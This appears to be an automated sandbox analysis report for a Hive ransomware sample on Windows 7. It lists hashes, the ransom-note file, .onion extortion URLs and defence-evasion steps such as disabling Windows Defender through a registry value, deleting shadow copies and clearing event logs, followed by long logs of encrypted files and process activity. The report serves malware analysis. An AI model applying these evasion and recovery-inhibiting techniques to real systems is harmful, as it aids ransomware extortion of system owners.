Analysis
-
max time kernel
160s -
max time network
126s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
12-01-2022 19:09
Static task
static1
Behavioral task
behavioral1
Sample
fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe
Resource
win7-en-20211208
General
-
Target
fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe
-
Size
2.7MB
-
MD5
524065ad3f33adcf7784f997d1089af4
-
SHA1
754e4389ce52c20629154313a8f19251b05f7e75
-
SHA256
fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de
-
SHA512
87e52e975aafcb2256f8fb9aa10afbd78f70cdf0ccb399573087bc88044e289ac87678fcce34e29eb5af847ba910d29e3d5f4f72259ffe5e4e8cfce63b6ee69a
Malware Config
Extracted
C:\Program Files\7-Zip\4a7Z_HOW_TO_DECRYPT.txt
hive
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid process 2140 MpCmdRun.exe -
Hive
A ransomware written in Golang first seen in June 2021.
-
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 2076 bcdedit.exe 2100 bcdedit.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
Processes:
fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exedescription ioc process File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02356_.WMF.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_sMUglmgXaOQ0.7vilx fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SlateBlue.css.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_xy6sHfieqqc0.7vilx fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files\Java\jre7\lib\jfr\default.jfc.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_JBpz6btcXIY0.7vilx fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0301418.WMF.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_INoR85N0wzw0.7vilx fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions\Document.gif.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_VZhqpKGzgZk0.7vilx fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\144DPI\(144DPI)greenStateIcon.png fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\North_Dakota\Center.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_y97lD1-8Uvw0.7vilx fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-print.xml.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_Tb6T9d5ISJc0.7vilx fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files\Windows Mail\es-ES\msoeres.dll.mui fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\BORDERS\MSART7.BDR.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_Ky07mdlPd-I0.7vilx fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\EmptyDatabase.zip.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_3CxjwLR3M-I0.7vilx fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\bg-desk.png fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_precomp_matte.wmv fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Macau.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_kWKQs3wEJo40.7vilx fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01173_.WMF.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_42tRPV6mNiY0.7vilx fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\4a7Z_HOW_TO_DECRYPT.txt fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\specialoccasion.png fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0212953.WMF.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_arNdJFQIkc80.7vilx fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\MP00021_.WMF.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_XlYBolJFvKw0.7vilx fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01236U.BMP.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_as443v6H82Q0.7vilx fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File created C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Desert\4a7Z_HOW_TO_DECRYPT.txt fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\license.html.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_IW6Snn9pz4o0.7vilx fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files\Windows Sidebar\fr-FR\Sidebar.exe.mui fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18210_.WMF.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_AAHY4eQbWWU0.7vilx fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\ACCWIZ\ACWZTOOL.ACCDE.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_-1_CjL-_7EQ0.7vilx fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL097.XML.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_v_8pNnhTru80.7vilx fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\45.png fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File created C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\LAYERS\4a7Z_HOW_TO_DECRYPT.txt fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\NavigationRight_SelectionSubpicture.png fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0199307.WMF.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_DHNstYy3HJY0.7vilx fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Juneau.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_tZY5lSVYiGA0.7vilx fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD00382_.WMF.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_LWJ4VosnqSY0.7vilx fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00170_.WMF.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_hIgcKRu40lY0.7vilx fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\notes-static.png fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Push\NavigationRight_ButtonGraphic.png fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\WORDREP.DPV.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_YUBnwULW9Uo0.7vilx fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\reveal_rest.png fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File created C:\Program Files\Java\jre7\lib\security\4a7Z_HOW_TO_DECRYPT.txt fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.win32.win32.x86_64_3.103.1.v20140903-1947.jar.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_zsivfCxq9900.7vilx fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Stationery\1033\NOTEBOOK.JPG.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_wlJ5ZoLhppw0.7vilx fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-lib-uihandler_ja.jar.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_Rz8F7kbEc8k0.7vilx fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\logo.png fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\TRANSLAT\FREN\MSB1FREN.ITS.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_O3udpGSPqBs0.7vilx fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\ink\en-US\micaut.dll.mui fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Pushpin.xml.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_XrZ1nygenpI0.7vilx fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\BORDERS\MSART6.BDR.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_cDeWpVK2t9U0.7vilx fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\4a7Z_HOW_TO_DECRYPT.txt fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Prague.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_5N2ddHDno1I0.7vilx fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler.xml.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_u3K8R2_vYXk0.7vilx fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21298_.GIF.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_n_UZvscAGEE0.7vilx fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\SETLANG_K_COL.HXK.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_ztfGfJy3WBI0.7vilx fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\rtf_underline.gif.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_DSpVepB64QQ0.7vilx fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL106.XML.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_LzPPLt--dEg0.7vilx fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\META-INF\MANIFEST.MF.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_hB4KL9VbdAk0.7vilx fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0164153.JPG.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_4HFJrVDfK_U0.7vilx fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341447.JPG.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_gHZcAqbvBaw0.7vilx fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\MSPUB_COL.HXT.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_QxUfmxq-SE00.7vilx fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME35.CSS.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_yKzWWKw1EKI0.7vilx fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Tbilisi.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_GCIQHn1N-gU0.7vilx fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0187861.WMF.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_oAySEKdt7dI0.7vilx fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Desert.css.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_UOCicoHhpAw0.7vilx fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 1500 vssadmin.exe -
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
notepad.exepid process 2644 notepad.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepowershell.exefc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exepid process 2172 powershell.exe 2264 powershell.exe 744 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exedescription pid process Token: SeSecurityPrivilege 1564 wevtutil.exe Token: SeBackupPrivilege 1564 wevtutil.exe Token: SeSecurityPrivilege 1916 wevtutil.exe Token: SeBackupPrivilege 1916 wevtutil.exe Token: SeSecurityPrivilege 1904 wevtutil.exe Token: SeBackupPrivilege 1904 wevtutil.exe Token: SeIncreaseQuotaPrivilege 328 wmic.exe Token: SeSecurityPrivilege 328 wmic.exe Token: SeTakeOwnershipPrivilege 328 wmic.exe Token: SeLoadDriverPrivilege 328 wmic.exe Token: SeSystemProfilePrivilege 328 wmic.exe Token: SeSystemtimePrivilege 328 wmic.exe Token: SeProfSingleProcessPrivilege 328 wmic.exe Token: SeIncBasePriorityPrivilege 328 wmic.exe Token: SeCreatePagefilePrivilege 328 wmic.exe Token: SeBackupPrivilege 328 wmic.exe Token: SeRestorePrivilege 328 wmic.exe Token: SeShutdownPrivilege 328 wmic.exe Token: SeDebugPrivilege 328 wmic.exe Token: SeSystemEnvironmentPrivilege 328 wmic.exe Token: SeRemoteShutdownPrivilege 328 wmic.exe Token: SeUndockPrivilege 328 wmic.exe Token: SeManageVolumePrivilege 328 wmic.exe Token: 33 328 wmic.exe Token: 34 328 wmic.exe Token: 35 328 wmic.exe Token: SeIncreaseQuotaPrivilege 428 wmic.exe Token: SeSecurityPrivilege 428 wmic.exe Token: SeTakeOwnershipPrivilege 428 wmic.exe Token: SeLoadDriverPrivilege 428 wmic.exe Token: SeSystemProfilePrivilege 428 wmic.exe Token: SeSystemtimePrivilege 428 wmic.exe Token: SeProfSingleProcessPrivilege 428 wmic.exe Token: SeIncBasePriorityPrivilege 428 wmic.exe Token: SeCreatePagefilePrivilege 428 wmic.exe Token: SeBackupPrivilege 428 wmic.exe Token: SeRestorePrivilege 428 wmic.exe Token: SeShutdownPrivilege 428 wmic.exe Token: SeDebugPrivilege 428 wmic.exe Token: SeSystemEnvironmentPrivilege 428 wmic.exe Token: SeRemoteShutdownPrivilege 428 wmic.exe Token: SeUndockPrivilege 428 wmic.exe Token: SeManageVolumePrivilege 428 wmic.exe Token: 33 428 wmic.exe Token: 34 428 wmic.exe Token: 35 428 wmic.exe Token: SeIncreaseQuotaPrivilege 428 wmic.exe Token: SeSecurityPrivilege 428 wmic.exe Token: SeTakeOwnershipPrivilege 428 wmic.exe Token: SeLoadDriverPrivilege 428 wmic.exe Token: SeSystemProfilePrivilege 428 wmic.exe Token: SeSystemtimePrivilege 428 wmic.exe Token: SeProfSingleProcessPrivilege 428 wmic.exe Token: SeIncBasePriorityPrivilege 428 wmic.exe Token: SeCreatePagefilePrivilege 428 wmic.exe Token: SeBackupPrivilege 428 wmic.exe Token: SeRestorePrivilege 428 wmic.exe Token: SeShutdownPrivilege 428 wmic.exe Token: SeDebugPrivilege 428 wmic.exe Token: SeSystemEnvironmentPrivilege 428 wmic.exe Token: SeRemoteShutdownPrivilege 428 wmic.exe Token: SeUndockPrivilege 428 wmic.exe Token: SeManageVolumePrivilege 428 wmic.exe Token: 33 428 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 744 wrote to memory of 520 744 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe net.exe PID 744 wrote to memory of 520 744 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe net.exe PID 744 wrote to memory of 520 744 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe net.exe PID 520 wrote to memory of 848 520 net.exe net1.exe PID 520 wrote to memory of 848 520 net.exe net1.exe PID 520 wrote to memory of 848 520 net.exe net1.exe PID 744 wrote to memory of 532 744 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe net.exe PID 744 wrote to memory of 532 744 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe net.exe PID 744 wrote to memory of 532 744 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe net.exe PID 532 wrote to memory of 628 532 net.exe net1.exe PID 532 wrote to memory of 628 532 net.exe net1.exe PID 532 wrote to memory of 628 532 net.exe net1.exe PID 744 wrote to memory of 1624 744 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe net.exe PID 744 wrote to memory of 1624 744 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe net.exe PID 744 wrote to memory of 1624 744 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe net.exe PID 1624 wrote to memory of 1108 1624 net.exe net1.exe PID 1624 wrote to memory of 1108 1624 net.exe net1.exe PID 1624 wrote to memory of 1108 1624 net.exe net1.exe PID 744 wrote to memory of 796 744 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe net.exe PID 744 wrote to memory of 796 744 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe net.exe PID 744 wrote to memory of 796 744 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe net.exe PID 796 wrote to memory of 964 796 net.exe net1.exe PID 796 wrote to memory of 964 796 net.exe net1.exe PID 796 wrote to memory of 964 796 net.exe net1.exe PID 744 wrote to memory of 2008 744 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe net.exe PID 744 wrote to memory of 2008 744 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe net.exe PID 744 wrote to memory of 2008 744 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe net.exe PID 2008 wrote to memory of 1640 2008 net.exe net1.exe PID 2008 wrote to memory of 1640 2008 net.exe net1.exe PID 2008 wrote to memory of 1640 2008 net.exe net1.exe PID 744 wrote to memory of 1820 744 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe net.exe PID 744 wrote to memory of 1820 744 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe net.exe PID 744 wrote to memory of 1820 744 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe net.exe PID 1820 wrote to memory of 1252 1820 net.exe net1.exe PID 1820 wrote to memory of 1252 1820 net.exe net1.exe PID 1820 wrote to memory of 1252 1820 net.exe net1.exe PID 744 wrote to memory of 2036 744 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe net.exe PID 744 wrote to memory of 2036 744 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe net.exe PID 744 wrote to memory of 2036 744 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe net.exe PID 2036 wrote to memory of 1860 2036 net.exe net1.exe PID 2036 wrote to memory of 1860 2036 net.exe net1.exe PID 2036 wrote to memory of 1860 2036 net.exe net1.exe PID 744 wrote to memory of 1460 744 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe net.exe PID 744 wrote to memory of 1460 744 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe net.exe PID 744 wrote to memory of 1460 744 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe net.exe PID 1460 wrote to memory of 1500 1460 net.exe net1.exe PID 1460 wrote to memory of 1500 1460 net.exe net1.exe PID 1460 wrote to memory of 1500 1460 net.exe net1.exe PID 744 wrote to memory of 1548 744 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe sc.exe PID 744 wrote to memory of 1548 744 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe sc.exe PID 744 wrote to memory of 1548 744 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe sc.exe PID 744 wrote to memory of 868 744 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe sc.exe PID 744 wrote to memory of 868 744 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe sc.exe PID 744 wrote to memory of 868 744 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe sc.exe PID 744 wrote to memory of 588 744 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe sc.exe PID 744 wrote to memory of 588 744 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe sc.exe PID 744 wrote to memory of 588 744 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe sc.exe PID 744 wrote to memory of 1760 744 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe sc.exe PID 744 wrote to memory of 1760 744 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe sc.exe PID 744 wrote to memory of 1760 744 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe sc.exe PID 744 wrote to memory of 900 744 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe sc.exe PID 744 wrote to memory of 900 744 